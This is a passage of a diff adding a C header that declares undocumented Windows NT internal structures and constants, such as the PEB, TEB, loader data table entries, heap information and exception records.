LDRP_MM_LOADED 0x40000000 +#define LDRP_COMPAT_DATABASE_PROCESSED 0x80000000 + +#define LDR_GET_DLL_HANDLE_EX_UNCHANGED_REFCOUNT 0x00000001 +#define LDR_GET_DLL_HANDLE_EX_PIN 0x00000002 + +#define LDR_ADDREF_DLL_PIN 0x00000001 + +#define LDR_GET_PROCEDURE_ADDRESS_DONT_RECORD_FORWARDER 0x00000001 + +#define LDR_LOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001 +#define LDR_LOCK_LOADER_LOCK_FLAG_TRY_ONLY 0x00000002 + +#define LDR_LOCK_LOADER_LOCK_DISPOSITION_INVALID 0 +#define LDR_LOCK_LOADER_LOCK_DISPOSITION_LOCK_ACQUIRED 1 +#define LDR_LOCK_LOADER_LOCK_DISPOSITION_LOCK_NOT_ACQUIRED 2 + +#define LDR_UNLOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001 + +#define LDR_DLL_NOTIFICATION_REASON_LOADED 1 +#define LDR_DLL_NOTIFICATION_REASON_UNLOADED 2 + +typedef struct _LDR_DLL_LOADED_NOTIFICATION_DATA +{ + ULONG Flags; + PUNICODE_STRING FullDllName; + PUNICODE_STRING BaseDllName; + PVOID DllBase; + ULONG SizeOfImage; +} LDR_DLL_LOADED_NOTIFICATION_DATA, *PLDR_DLL_LOADED_NOTIFICATION_DATA; + +typedef struct _LDR_DLL_UNLOADED_NOTIFICATION_DATA +{ + ULONG Flags; + PCUNICODE_STRING FullDllName; + PCUNICODE_STRING BaseDllName; + PVOID DllBase; + ULONG SizeOfImage; +} LDR_DLL_UNLOADED_NOTIFICATION_DATA, *PLDR_DLL_UNLOADED_NOTIFICATION_DATA; + +typedef union _LDR_DLL_NOTIFICATION_DATA +{ + LDR_DLL_LOADED_NOTIFICATION_DATA Loaded; + LDR_DLL_UNLOADED_NOTIFICATION_DATA Unloaded; +} LDR_DLL_NOTIFICATION_DATA, *PLDR_DLL_NOTIFICATION_DATA; + +typedef VOID (NTAPI *PLDR_DLL_NOTIFICATION_FUNCTION)( + IN ULONG NotificationReason, + IN PLDR_DLL_NOTIFICATION_DATA NotificationData, + IN OPTIONAL PVOID Context + ); + +typedef struct _RTL_PROCESS_MODULE_INFORMATION +{ + HANDLE Section; + PVOID MappedBase; + PVOID ImageBase; + ULONG ImageSize; + ULONG Flags; + USHORT LoadOrderIndex; + USHORT InitOrderIndex; + USHORT LoadCount; + USHORT OffsetToFileName; + UCHAR FullPathName[256]; +} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION; + +typedef struct _RTL_PROCESS_MODULES +{ + ULONG NumberOfModules; + RTL_PROCESS_MODULE_INFORMATION Modules[1]; +} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES; + +typedef struct _RTL_PROCESS_MODULE_INFORMATION_EX +{ + USHORT NextOffset; + RTL_PROCESS_MODULE_INFORMATION BaseInfo; + ULONG ImageChecksum; + ULONG TimeDateStamp; + PVOID DefaultBase; +} RTL_PROCESS_MODULE_INFORMATION_EX, *PRTL_PROCESS_MODULE_INFORMATION_EX; + +// +// Loader Data Table. Used to track DLLs loaded into an +// image. +// +#ifdef __cplusplus +struct LIST_ENTRY_EX : public LIST_ENTRY +{ + BYTE unk1[8]; + HANDLE base; + BYTE unk2[20]; + WCHAR* name; +}; +#endif + +typedef struct _LDR_DATA_TABLE_ENTRY +{ + LIST_ENTRY InLoadOrderLinks; + LIST_ENTRY InMemoryOrderLinks; + LIST_ENTRY InInitializationOrderLinks; + PVOID DllBase; + PVOID EntryPoint; + ULONG SizeOfImage; + UNICODE_STRING FullDllName; + UNICODE_STRING BaseDllName; + ULONG Flags; + USHORT LoadCount; + USHORT TlsIndex; + union + { + LIST_ENTRY HashLinks; + struct + { + PVOID SectionPointer; + ULONG CheckSum; + }; + }; + union + { + ULONG TimeDateStamp; + PVOID LoadedImports; + }; + PVOID EntryPointActivationContext; + PVOID PatchInformation; + LIST_ENTRY ForwarderLinks; + LIST_ENTRY ServiceTagLinks; + LIST_ENTRY StaticLinks; + PVOID ContextInformation; + ULONG_PTR OriginalBase; + LARGE_INTEGER LoadTime; +} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; + +typedef const struct _LDR_DATA_TABLE_ENTRY *PCLDR_DATA_TABLE_ENTRY; + +typedef NTSTATUS LDR_RELOCATE_IMAGE_RETURN_TYPE; + +struct _FLS_CALLBACK_INFO; + +typedef BOOLEAN (NTAPI *PDLL_INIT_ROUTINE)( + IN PVOID DllHandle, + IN ULONG Reason, + IN OPTIONAL PCONTEXT Context + ); + +#define DOS_MAX_COMPONENT_LENGTH 255 +#define DOS_MAX_PATH_LENGTH (DOS_MAX_COMPONENT_LENGTH + 5) + +#define RTL_USER_PROC_CURDIR_CLOSE 0x00000002 +#define RTL_USER_PROC_CURDIR_INHERIT 0x00000003 + +typedef struct _RTL_RELATIVE_NAME +{ + STRING RelativeName; + HANDLE ContainingDirectory; +} RTL_RELATIVE_NAME, *PRTL_RELATIVE_NAME; + +typedef struct _RTLP_CURDIR_REF *PRTLP_CURDIR_REF; + +typedef struct _RTL_RELATIVE_NAME_U +{ + UNICODE_STRING RelativeName; + HANDLE ContainingDirectory; + PRTLP_CURDIR_REF CurDirRef; +} RTL_RELATIVE_NAME_U, *PRTL_RELATIVE_NAME_U; + +typedef enum _RTL_PATH_TYPE +{ + RtlPathTypeUnknown, + RtlPathTypeUncAbsolute, + RtlPathTypeDriveAbsolute, + RtlPathTypeDriveRelative, + RtlPathTypeRooted, + RtlPathTypeRelative, + RtlPathTypeLocalDevice, + RtlPathTypeRootLocalDevice +} RTL_PATH_TYPE, *PRTL_PATH_TYPE; + +#define RTL_MAX_DRIVE_LETTERS 32 +#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001 + +// 18/04/2011 updated +typedef struct _PEB +{ + BOOLEAN InheritedAddressSpace; + BOOLEAN ReadImageFileExecOptions; + BOOLEAN BeingDebugged; + union + { + BOOLEAN BitField; + struct + { + BOOLEAN ImageUsesLargePages : 1; + BOOLEAN IsProtectedProcess : 1; + BOOLEAN IsLegacyProcess : 1; + BOOLEAN IsImageDynamicallyRelocated : 1; + BOOLEAN SkipPatchingUser32Forwarders : 1; + BOOLEAN SpareBits : 3; + }; + }; + HANDLE Mutant; + + PVOID ImageBaseAddress; + PPEB_LDR_DATA Ldr; + PRTL_USER_PROCESS_PARAMETERS ProcessParameters; + PVOID SubSystemData; + PVOID ProcessHeap; + PRTL_CRITICAL_SECTION FastPebLock; + PVOID AtlThunkSListPtr; + PVOID IFEOKey; + union + { + ULONG CrossProcessFlags; + struct + { + ULONG ProcessInJob : 1; + ULONG ProcessInitializing : 1; + ULONG ProcessUsingVEH : 1; + ULONG ProcessUsingVCH : 1; + ULONG ProcessUsingFTH : 1; + ULONG ReservedBits0 : 27; + }; + ULONG EnvironmentUpdateCount; + }; + union + { + PVOID KernelCallbackTable; + PVOID UserSharedInfoPtr; + }; + ULONG SystemReserved[1]; + ULONG AtlThunkSListPtr32; + PVOID ApiSetMap; + ULONG TlsExpansionCounter; + PVOID TlsBitmap; + ULONG TlsBitmapBits[2]; + PVOID ReadOnlySharedMemoryBase; + PVOID HotpatchInformation; + PPVOID ReadOnlyStaticServerData; + PVOID AnsiCodePageData; + PVOID OemCodePageData; + PVOID UnicodeCaseTableData; + + ULONG NumberOfProcessors; + ULONG NtGlobalFlag; + + LARGE_INTEGER CriticalSectionTimeout; + SIZE_T HeapSegmentReserve; + SIZE_T HeapSegmentCommit; + SIZE_T HeapDeCommitTotalFreeThreshold; + SIZE_T HeapDeCommitFreeBlockThreshold; + + ULONG NumberOfHeaps; + ULONG MaximumNumberOfHeaps; + PPVOID ProcessHeaps; + + PVOID GdiSharedHandleTable; + PVOID ProcessStarterHelper; + ULONG GdiDCAttributeList; + + PRTL_CRITICAL_SECTION LoaderLock; + + ULONG OSMajorVersion; + ULONG OSMinorVersion; + USHORT OSBuildNumber; + USHORT OSCSDVersion; + ULONG OSPlatformId; + ULONG ImageSubsystem; + ULONG ImageSubsystemMajorVersion; + ULONG ImageSubsystemMinorVersion; + ULONG_PTR ImageProcessAffinityMask; + GDI_HANDLE_BUFFER GdiHandleBuffer; + PVOID PostProcessInitRoutine; + + PVOID TlsExpansionBitmap; + ULONG TlsExpansionBitmapBits[32]; + + ULONG SessionId; + + ULARGE_INTEGER AppCompatFlags; + ULARGE_INTEGER AppCompatFlagsUser; + PVOID pShimData; + PVOID AppCompatInfo; + + UNICODE_STRING CSDVersion; + + PVOID ActivationContextData; + PVOID ProcessAssemblyStorageMap; + PVOID SystemDefaultActivationContextData; + PVOID SystemAssemblyStorageMap; + + SIZE_T MinimumStackCommit; + + PPVOID FlsCallback; + LIST_ENTRY FlsListHead; + PVOID FlsBitmap; + ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)]; + ULONG FlsHighIndex; + + PVOID WerRegistrationData; + PVOID WerShipAssertPtr; + PVOID pContextData; + PVOID pImageHeaderHash; + union + { + ULONG TracingFlags; + struct + { + ULONG HeapTracingEnabled : 1; + ULONG CritSecTracingEnabled : 1; + ULONG SpareTracingBits : 30; + }; + }; +} PEB, *PPEB; + +// +// Fusion/sxs thread state information (aka, stuff noone cares about!) +// + +#define ACTIVATION_CONTEXT_STACK_FLAG_QUERIES_DISABLED (0x00000001) + +typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME +{ + struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous; + struct _ACTIVATION_CONTEXT* ActivationContext; + ULONG Flags; +} RTL_ACTIVATION_CONTEXT_STACK_FRAME, *PRTL_ACTIVATION_CONTEXT_STACK_FRAME; + + +typedef struct _ACTIVATION_CONTEXT_STACK +{ + struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME * ActiveFrame; + struct _LIST_ENTRY FrameListCache; + ULONG Flags; + ULONG NextCookieSequenceNumber; + ULONG StackId; +} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK; + +typedef const ACTIVATION_CONTEXT_STACK * PCACTIVATION_CONTEXT_STACK; + +#define TEB_ACTIVE_FRAME_CONTEXT_FLAG_EXTENDED (0x00000001) + +typedef struct _TEB_ACTIVE_FRAME_CONTEXT +{ + ULONG Flags; + PSTR FrameName; +} TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT; + +typedef const TEB_ACTIVE_FRAME_CONTEXT *PCTEB_ACTIVE_FRAME_CONTEXT; + +typedef struct _TEB_ACTIVE_FRAME_CONTEXT_EX +{ + TEB_ACTIVE_FRAME_CONTEXT BasicContext; + PCSTR SourceLocation; // e.g. "c:\windows\system32\ntdll.dll" +} TEB_ACTIVE_FRAME_CONTEXT_EX, *PTEB_ACTIVE_FRAME_CONTEXT_EX; + +typedef const TEB_ACTIVE_FRAME_CONTEXT_EX *PCTEB_ACTIVE_FRAME_CONTEXT_EX; + +#define TEB_ACTIVE_FRAME_FLAG_EXTENDED (0x00000001) + +// 17/3/2011 updated +typedef struct _TEB_ACTIVE_FRAME +{ + ULONG Flags; + struct _TEB_ACTIVE_FRAME *Previous; + PTEB_ACTIVE_FRAME_CONTEXT Context; +} TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME; + +typedef const TEB_ACTIVE_FRAME *PCTEB_ACTIVE_FRAME; + +typedef struct _TEB_ACTIVE_FRAME_EX +{ + TEB_ACTIVE_FRAME BasicFrame; + PVOID ExtensionIdentifier; // use address of your DLL Main or something mapping in the address space +} TEB_ACTIVE_FRAME_EX, *PTEB_ACTIVE_FRAME_EX; + +typedef const TEB_ACTIVE_FRAME_EX *PCTEB_ACTIVE_FRAME_EX; + +// 18/04/2011 +typedef struct _TEB +{ + NT_TIB NtTib; + + PVOID EnvironmentPointer; + CLIENT_ID ClientId; + PVOID ActiveRpcHandle; + PVOID ThreadLocalStoragePointer; + PPEB ProcessEnvironmentBlock; + + ULONG LastErrorValue; + ULONG CountOfOwnedCriticalSections; + PVOID CsrClientThread; + PVOID Win32ThreadInfo; + ULONG User32Reserved[26]; + ULONG UserReserved[5]; + PVOID WOW32Reserved; + LCID CurrentLocale; + ULONG FpSoftwareStatusRegister; + PVOID SystemReserved1[54]; + NTSTATUS ExceptionCode; + PVOID ActivationContextStackPointer; +#if defined(_M_X64) + UCHAR SpareBytes[24]; +#else + UCHAR SpareBytes[36]; +#endif + ULONG TxFsContext; + + GDI_TEB_BATCH GdiTebBatch; + CLIENT_ID RealClientId; + HANDLE GdiCachedProcessHandle; + ULONG GdiClientPID; + ULONG GdiClientTID; + PVOID GdiThreadLocalInfo; + ULONG_PTR Win32ClientInfo[62]; + PVOID glDispatchTable[233]; + ULONG_PTR glReserved1[29]; + PVOID glReserved2; + PVOID glSectionInfo; + PVOID glSection; + PVOID glTable; + PVOID glCurrentRC; + PVOID glContext; + + NTSTATUS LastStatusValue; + UNICODE_STRING StaticUnicodeString; + WCHAR StaticUnicodeBuffer[261]; + + PVOID DeallocationStack; + PVOID TlsSlots[64]; + LIST_ENTRY TlsLinks; + + PVOID Vdm; + PVOID ReservedForNtRpc; + PVOID DbgSsReserved[2]; + + ULONG HardErrorMode; +#if defined(_M_X64) + PVOID Instrumentation[11]; +#else + PVOID Instrumentation[9]; +#endif + GUID ActivityId; + + PVOID SubProcessTag; + PVOID EtwLocalData; + PVOID EtwTraceData; + PVOID WinSockData; + ULONG GdiBatchCount; + + union + { + PROCESSOR_NUMBER CurrentIdealProcessor; + ULONG IdealProcessorValue; + struct + { + UCHAR ReservedPad0; + UCHAR ReservedPad1; + UCHAR ReservedPad2; + UCHAR IdealProcessor; + }; + }; + + ULONG GuaranteedStackBytes; + PVOID ReservedForPerf; + PVOID ReservedForOle; + ULONG WaitingOnLoaderLock; + PVOID SavedPriorityState; + ULONG_PTR SoftPatchPtr1; + PVOID ThreadPoolData; + PPVOID TlsExpansionSlots; +#if defined(_M_X64) + PVOID DeallocationBStore; + PVOID BStoreLimit; +#endif + ULONG MuiGeneration; + ULONG IsImpersonating; + PVOID NlsCache; + PVOID pShimData; + ULONG HeapVirtualAffinity; + HANDLE CurrentTransactionHandle; + PTEB_ACTIVE_FRAME ActiveFrame; + PVOID FlsData; + + PVOID PreferredLanguages; + PVOID UserPrefLanguages; + PVOID MergedPrefLanguages; + ULONG MuiImpersonation; + + union + { + USHORT CrossTebFlags; + USHORT SpareCrossTebBits : 16; + }; + union + { + USHORT SameTebFlags; + struct + { + USHORT SafeThunkCall : 1; + USHORT InDebugPrint : 1; + USHORT HasFiberData : 1; + USHORT SkipThreadAttach : 1; + USHORT WerInShipAssertCode : 1; + USHORT RanProcessInit : 1; + USHORT ClonedThread : 1; + USHORT SuppressDebugMsg : 1; + USHORT DisableUserStackWalk : 1; + USHORT RtlExceptionAttached : 1; + USHORT InitialThread : 1; + USHORT SpareSameTebBits : 1; + }; + }; + + PVOID TxnScopeEnterCallback; + PVOID TxnScopeExitCallback; + PVOID TxnScopeContext; + ULONG LockCount; + ULONG SpareUlong0; + PVOID ResourceRetValue; +} TEB, *PTEB; + +#define PcTeb 0x18 + +#define RtlGetCurrentProcessId() (HandleToUlong(NtCurrentTeb()->ClientId.UniqueProcess)) +#define RtlGetCurrentThreadId() (HandleToUlong(NtCurrentTeb()->ClientId.UniqueThread)) + +#define ZwCurrentProcess() NtCurrentProcess() + +// 17/3/2011 added +__inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmentBlock; } +#define WOWAddress() ( NtCurrentTeb()->WOW32Reserved ) +#define RtlProcessHeap() ( NtCurrentPeb()->ProcessHeap ) + +// 28/3/2011 added +#define RtlAcquireLockRoutine(L) RtlEnterCriticalSection((PRTL_CRITICAL_SECTION)(L)) + +// added 18.04.2011 +typedef struct _THREAD_BASIC_INFORMATION +{ + NTSTATUS ExitStatus; + PTEB TebBaseAddress; + CLIENT_ID ClientId; + KAFFINITY AffinityMask; + KPRIORITY Priority; + KPRIORITY BasePriority; +} THREAD_BASIC_INFORMATION, *PTHREAD_BASIC_INFORMATION; + +// added 20.12.11 +// Process Device Map information +// NtQueryInformationProcess using ProcessDeviceMap +// NtSetInformationProcess using ProcessDeviceMap +// +//#pragma pack (push, 1) +typedef struct _PROCESS_DEVICEMAP_INFORMATION { + union { + struct { + HANDLE DirectoryHandle; + } Set; + struct { + ULONG DriveMap; + UCHAR DriveType[ 32 ]; + } Query; + }; +} PROCESS_DEVICEMAP_INFORMATION, *PPROCESS_DEVICEMAP_INFORMATION; + +typedef struct _PROCESS_DEVICEMAP_INFORMATION_EX { + union { + struct { + HANDLE DirectoryHandle; + } Set; + struct { + ULONG DriveMap; + UCHAR DriveType[ 32 ]; + } Query; + }; + ULONG Flags; // specifies that the query type +} PROCESS_DEVICEMAP_INFORMATION_EX, *PPROCESS_DEVICEMAP_INFORMATION_EX; +//#pragma pack(pop) + +typedef struct _PROCESS_BASIC_INFORMATION +{ + NTSTATUS ExitStatus; + PPEB PebBaseAddress; + ULONG_PTR AffinityMask; + KPRIORITY BasePriority; + ULONG_PTR UniqueProcessId; + ULONG_PTR InheritedFromUniqueProcessId; +} PROCESS_BASIC_INFORMATION; +typedef PROCESS_BASIC_INFORMATION *PPROCESS_BASIC_INFORMATION; + +typedef struct _PROCESS_EXTENDED_BASIC_INFORMATION +{ + SIZE_T Size; // Must be set to structure size on input + PROCESS_BASIC_INFORMATION BasicInfo; + union + { + ULONG Flags; + struct + { + ULONG IsProtectedProcess : 1; + ULONG IsWow64Process : 1; + ULONG IsProcessDeleting : 1; + ULONG IsCrossSessionCreate : 1; + ULONG SpareBits : 28; + } DUMMYSTRUCTNAME; + } DUMMYUNIONNAME; +} PROCESS_EXTENDED_BASIC_INFORMATION, *PPROCESS_EXTENDED_BASIC_INFORMATION; + +typedef struct _RTL_HEAP_ENTRY +{ + SIZE_T Size; + USHORT Flags; + USHORT AllocatorBackTraceIndex; + union + { + struct + { + SIZE_T Settable; + ULONG Tag; + } s1; // All other heap entries + struct + { + SIZE_T CommittedSize; + PVOID FirstBlock; + } s2; // RTL_SEGMENT + } u; +} RTL_HEAP_ENTRY, *PRTL_HEAP_ENTRY; + +#define RTL_HEAP_BUSY (USHORT)0x0001 +#define RTL_HEAP_SEGMENT (USHORT)0x0002 +#define RTL_HEAP_SETTABLE_VALUE (USHORT)0x0010 +#define RTL_HEAP_SETTABLE_FLAG1 (USHORT)0x0020 +#define RTL_HEAP_SETTABLE_FLAG2 (USHORT)0x0040 +#define RTL_HEAP_SETTABLE_FLAG3 (USHORT)0x0080 +#define RTL_HEAP_SETTABLE_FLAGS (USHORT)0x00E0 +#define RTL_HEAP_UNCOMMITTED_RANGE (USHORT)0x0100 +#define RTL_HEAP_PROTECTED_ENTRY (USHORT)0x0200 + +typedef struct _RTL_HEAP_TAG +{ + ULONG NumberOfAllocations; + ULONG NumberOfFrees; + SIZE_T BytesAllocated; + USHORT TagIndex; + USHORT CreatorBackTraceIndex; + WCHAR TagName[ 24 ]; +} RTL_HEAP_TAG, *PRTL_HEAP_TAG; + +typedef struct _RTL_HEAP_INFORMATION +{ + PVOID BaseAddress; + ULONG Flags; + USHORT EntryOverhead; + USHORT CreatorBackTraceIndex; + SIZE_T BytesAllocated; + SIZE_T BytesCommitted; + ULONG NumberOfTags; + ULONG NumberOfEntries; + ULONG NumberOfPseudoTags; + ULONG PseudoTagGranularity; + ULONG Reserved[ 5 ]; + PRTL_HEAP_TAG Tags; + PRTL_HEAP_ENTRY Entries; +} RTL_HEAP_INFORMATION, *PRTL_HEAP_INFORMATION; + +typedef struct _RTL_PROCESS_HEAPS +{ + ULONG NumberOfHeaps; + RTL_HEAP_INFORMATION Heaps[ 1 ]; +} RTL_PROCESS_HEAPS, *PRTL_PROCESS_HEAPS; + +typedef struct _RTL_PROCESS_LOCK_INFORMATION +{ + PVOID Address; + USHORT Type; + USHORT CreatorBackTraceIndex; + + HANDLE OwningThread; // from the thread's ClientId->UniqueThread + LONG LockCount; + ULONG ContentionCount; + ULONG EntryCount; + + // + // The following fields are only valid for Type == RTL_CRITSECT_TYPE + // + + LONG RecursionCount; + + // + // The following fields are only valid for Type == RTL_RESOURCE_TYPE + // + + ULONG NumberOfWaitingShared; + ULONG NumberOfWaitingExclusive; +} RTL_PROCESS_LOCK_INFORMATION, *PRTL_PROCESS_LOCK_INFORMATION; + +// do not name SHA_CTX, if using OpenSSL or such... produces errors. +typedef struct { + ULONG Unknown[6]; + ULONG State[5]; + ULONG Count[2]; + UCHAR Buffer[64]; +} ASHA_CTX, *PSHA_CTX; + +struct _CONTEXT; +struct _EXCEPTION_RECORD; + +// note, winnt.h ... such the pain-in-ass with this structure. +#if !defined(_WINNT_) +typedef +EXCEPTION_DISPOSITION +(*PEXCEPTION_ROUTINE) ( + IN struct _EXCEPTION_RECORD *ExceptionRecord, + IN PVOID EstablisherFrame, + IN OUT struct _CONTEXT *ContextRecord, + IN OUT PVOID DispatcherContext + ); + +typedef struct _EXCEPTION_REGISTRATION_RECORD { + struct _EXCEPTION_REGISTRATION_RECORD *Next; + PEXCEPTION_ROUTINE Handler; +} EXCEPTION_REGISTRATION_RECORD; + +typedef EXCEPTION_REGISTRATION_RECORD *PEXCEPTION_REGISTRATION_RECORD; +#endif + +#if !defined(POINTER_64) +#define POINTER_64 __ptr64 +typedef unsigned __int64 POINTER_64_INT; +#if defined(_M_X64) +#define POINTER_32 __ptr32 +#else +#define POINTER_32 +#endif +#endif + +typedef enum _NT_PRODUCT_TYPE +{ + NtProductWinNt = 1, + NtProductLanManNt, + NtProductServer +} NT_PRODUCT_TYPE, *PNT_PRODUCT_TYPE; + + +typedef enum _SUITE_TYPE +{ + SmallBusiness, + Enterprise, + BackOffice, + CommunicationServer, + TerminalServer, + SmallBusinessRestricted, + EmbeddedNT, + DataCenter, + SingleUserTS, + Personal, + Blade, + EmbeddedRestricted, + SecurityAppliance, + StorageServer, + ComputeServer, + MaxSuiteType +} SUITE_TYPE; + +#define VER_SERVER_NT 0x80000000 +#define VER_WORKSTATION_NT 0x40000000 +#define VER_SUITE_SMALLBUSINESS 0x00000001 +#define VER_SUITE_ENTERPRISE 0x00000002 +#define VER_SUITE_BACKOFFICE 0x00000004 +#define VER_SUITE_COMMUNICATIONS 0x00000008 +#define VER_SUITE_TERMINAL 0x00000010 +#define VER_SUITE_SMALLBUSINESS_RESTRICTED 0x00000020 +#define VER_SUITE_EMBEDDEDNT 0x00000040 +#define VER_SUITE_DATACENTER 0x00000080 +#define VER_SUITE_SINGLEUSERTS 0x00000100 +#define VER_SUITE_PERSONAL 0x00000200 +#define VER_SUITE_BLADE 0x00000400 +#define VER_SUITE_EMBEDDED_RESTRICTED 0x00000800 +#define VER_SUITE_SECURITY_APPLIANCE 0x00001000 +#define VER_SUITE_STORAGE_SERVER 0x00002000 +#define VER_SUITE_COMPUTE_SERVER 0x00004000 + +// +// exception structures +// + +#ifndef _WINNT_ // take presidence over winnt.h + +typedef struct _CONTEXT +{ + + // + // The flags values within this flag control the contents of + // a CONTEXT record. + // + // If the context record is used as an input parameter, then + // for each portion of the context record controlled by a flag + // whose value is set, it is assumed that that portion of the + // context record contains valid context. If the context record + // is being used to modify a threads context, then only that + // portion of the threads context will be modified. + // + // If the context record is used as an IN OUT parameter to capture + // the context of a thread, then only those portions of the thread's + // context corresponding to set flags will be returned. + // + // The context record is never used as an OUT only parameter. + // + + DWORD ContextFlags; + + // + // This section is specified/returned if CONTEXT_DEBUG_REGISTERS is + // set in ContextFlags. Note that CONTEXT_DEBUG_REGISTERS is NOT + // included in CONTEXT_FULL. + // + + DWORD Dr0; + DWORD Dr1; + DWORD Dr2; + DWORD Dr3; + DWORD Dr6; + DWORD Dr7; + + // + // This section is specified/returned if the + // ContextFlags word contians the flag CONTEXT_FLOATING_POINT. + // + + FLOATING_SAVE_AREA FloatSave; + + // + // This section is specified/returned if the + // ContextFlags word contians the flag CONTEXT_SEGMENTS. + // + + DWORD SegGs; + DWORD SegFs; + DWORD SegEs; + DWORD SegDs; + + // + // This section is specified/returned if the + // ContextFlags word contians the flag CONTEXT_INTEGER. + // + + DWORD Edi; + DWORD Esi; + DWORD Ebx; + DWORD Edx; + DWORD Ecx; + DWORD Eax; + + // + // This section is specified/returned if the + // ContextFlags word contians the flag CONTEXT_CONTROL. + // + + DWORD Ebp; + DWORD Eip; + DWORD SegCs; // MUST BE SANITIZED + DWORD EFlags; // MUST BE SANITIZED + DWORD Esp; + DWORD SegSs; + + // + // This section is specified/returned if the ContextFlags word + // contains the flag CONTEXT_EXTENDED_REGISTERS. + // The format and contexts are processor specific + // + + BYTE ExtendedRegisters[MAXIMUM_SUPPORTED_EXTENSION]; + +} CONTEXT, *PCONTEXT; + +typedef struct _EXCEPTION_RECORD +{ + DWORD ExceptionCode; // NTSTATUS code of the exception. + DWORD ExceptionFlags; // need more information + struct _EXCEPTION_RECORD *ExceptionRecord; // pointer to an extra record + PVOID ExceptionAddress; // address of the exception happen + DWORD NumberParameters; // more information needed ... + ULONG_PTR ExceptionInformation[EXCEPTION_MAXIMUM_PARAMETERS]; +} EXCEPTION_RECORD, *PEXCEPTION_RECORD; + +// +// Values put in ExceptionRecord.ExceptionInformation[0] +// First parameter is always in ExceptionInformation[1], +// Second parameter is always in ExceptionInformation[2] +// + +typedef struct _EXCEPTION_RECORD32 { + DWORD ExceptionCode; + DWORD ExceptionFlags; + DWORD ExceptionRecord; + DWORD ExceptionAddress; + DWORD NumberParameters; + DWORD ExceptionInformation[EXCEPTION_MAXIMUM_PARAMETERS]; +} EXCEPTION_RECORD32, *PEXCEPTION_RECORD32; + +typedef struct _EXCEPTION_RECORD64 { + DWORD ExceptionCode; + DWORD ExceptionFlags; + DWORD64 ExceptionRecord; + DWORD64 ExceptionAddress; + DWORD NumberParameters; + DWORD __unusedAlignment; + DWORD64 ExceptionInformation[EXCEPTION_MAXIMUM_PARAMETERS]; +} EXCEPTION_RECORD64, *PEXCEPTION_RECORD64; + +// +// Typedef for pointer returned by exception_info() +// + +typedef struct _EXCEPTION_POINTERS +{ + PEXCEPTION_RECORD ExceptionRecord; + PCONTEXT ContextRecord; +} EXCEPTION_POINTERS, *PEXCEPTION_POINTERS; + +#endif + +typedef NTSTATUS (NTAPI * PRTL_QUERY_REGISTRY_ROUTINE)( + IN PWSTR ValueName, + IN ULONG ValueType, + IN PVOID ValueData, + IN ULONG ValueLength, + IN PVOID Context, + IN PVOID EntryContext + ); + +typedef struct _RTL_QUERY_REGISTRY_TABLE { + PRTL_QUERY_REGISTRY_ROUTINE QueryRoutine; + ULONG Flags; + PWSTR Name; + PVOID EntryContext; + ULONG DefaultType; + PVOID DefaultData; + ULONG DefaultLength; + +} RTL_QUERY_REGISTRY_TABLE, *PRTL_QUERY_REGISTRY_TABLE; + +#define EXCEPTION_CHAIN_END ((struct _EXCEPTION_REGISTRATION_RECORD * POINTER_32)-1) + +#define MAJOR_VERSION 30 +#define MINOR_VERSION 00 +#define OS2_VERSION (MAJOR_VERSION << 8 | MINOR_VERSION ) + +#ifdef DBG +#define DBG_TEB_THREADNAME 16 +#define DBG_TEB_RESERVED_1 15 +#define DBG_TEB_RESERVED_2 14 +#define DBG_TEB_RESERVED_3 13 +#define DBG_TEB_RESERVED_4 12 +#define DBG_TEB_RESERVED_5 11 +#define DBG_TEB_RESERVED_6 10 +#define DBG_TEB_RESERVED_7 9 +#define DBG_TEB_RESERVED_8 8 +#endif // DBG + +#define PROCESS_PRIORITY_CLASS_UNKNOWN 0 +#define PROCESS_PRIORITY_CLASS_IDLE 1 +#define PROCESS_PRIORITY_CLASS_NORMAL 2 +#define PROCESS_PRIORITY_CLASS_HIGH 3 +#define PROCESS_PRIORITY_CLASS_REALTIME 4 +#define PROCESS_PRIORITY_CLASS_BELOW_NORMAL 5 +#define PROCESS_PRIORITY_CLASS_ABOVE_NORMAL 6 + +typedef struct _PROCESS_PRIORITY_CLASS { + BOOLEAN Foreground; + UCHAR PriorityClass; +} PROCESS_PRIORITY_CLASS, *PPROCESS_PRIORITY_CLASS; + +typedef struct _PROCESS_FOREGROUND_BACKGROUND { + BOOLEAN Foreground; +} PROCESS_FOREGROUND_BACKGROUND, *PPROCESS_FOREGROUND_BACKGROUND; + +typedef struct _FILE_PATH { + ULONG Version; + ULONG Length; + ULONG Type; + UCHAR FilePath[ANYSIZE_ARRAY]; +} FILE_PATH, *PFILE_PATH; + +#define FILE_PATH_VERSION 1 + +#define FILE_PATH_TYPE_ARC 1 +#define FILE_PATH_TYPE_ARC_SIGNATURE 2 +#define FILE_PATH_TYPE_NT 3 +#define FILE_PATH_TYPE_EFI 4 + +#define FILE_PATH_TYPE_MIN FILE_PATH_TYPE_ARC +#define FILE_PATH_TYPE_MAX FILE_PATH_TYPE_EFI + +typedef struct _WINDOWS_OS_OPTIONS { + UCHAR Signature[8]; + ULONG Version; + ULONG Length; + ULONG OsLoadPathOffset; + WCHAR OsLoadOptions[ANYSIZE_ARRAY]; + //FILE_PATH OsLoadPath; +} WINDOWS_OS_OPTIONS, *PWINDOWS_OS_OPTIONS; + +#define WINDOWS_OS_OPTIONS_SIGNATURE "WINDOWS" + +#define WINDOWS_OS_OPTIONS_VERSION 1 + +typedef struct _BOOT_ENTRY { + ULONG Version; + ULONG Length; + ULONG Id; + ULONG Attributes; + ULONG FriendlyNameOffset; + ULONG BootFilePathOffset; + ULONG OsOptionsLength; + UCHAR OsOptions[ANYSIZE_ARRAY]; + //WCHAR FriendlyName[ANYSIZE_ARRAY]; + //FILE_PATH BootFilePath; +} BOOT_ENTRY, *PBOOT_ENTRY; + +typedef 